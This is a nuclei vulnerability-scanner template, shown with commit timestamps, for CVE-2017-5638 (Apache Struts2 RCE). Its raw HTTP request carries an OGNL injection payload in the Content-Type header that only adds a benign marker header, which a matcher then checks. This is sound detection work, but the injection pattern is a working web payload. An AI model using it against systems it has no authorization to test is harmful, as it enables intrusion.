nuclei-templates/cves/2017/CVE-2017-5638.yaml

27 lines
1.1 KiB
YAML
Raw Normal View History

2021-01-02 05:02:50 +00:00
id: CVE-2017-5638
2020-08-19 13:13:31 +00:00
info:
2021-02-22 07:01:32 +00:00
author: Random Robbie
2021-03-06 06:26:16 +00:00
name: Apache Struts2 RCE
2020-08-19 13:13:31 +00:00
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
2021-02-22 07:01:32 +00:00
tags: cve,cve2017,struts,rce,apache
2021-04-18 13:02:50 +00:00
reference: https://github.com/mazen160/struts-pwn
2020-08-19 13:13:31 +00:00
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers:
- type: word
words:
2020-08-30 04:14:52 +00:00
- "X-Hacker: Bounty Plz"
part: header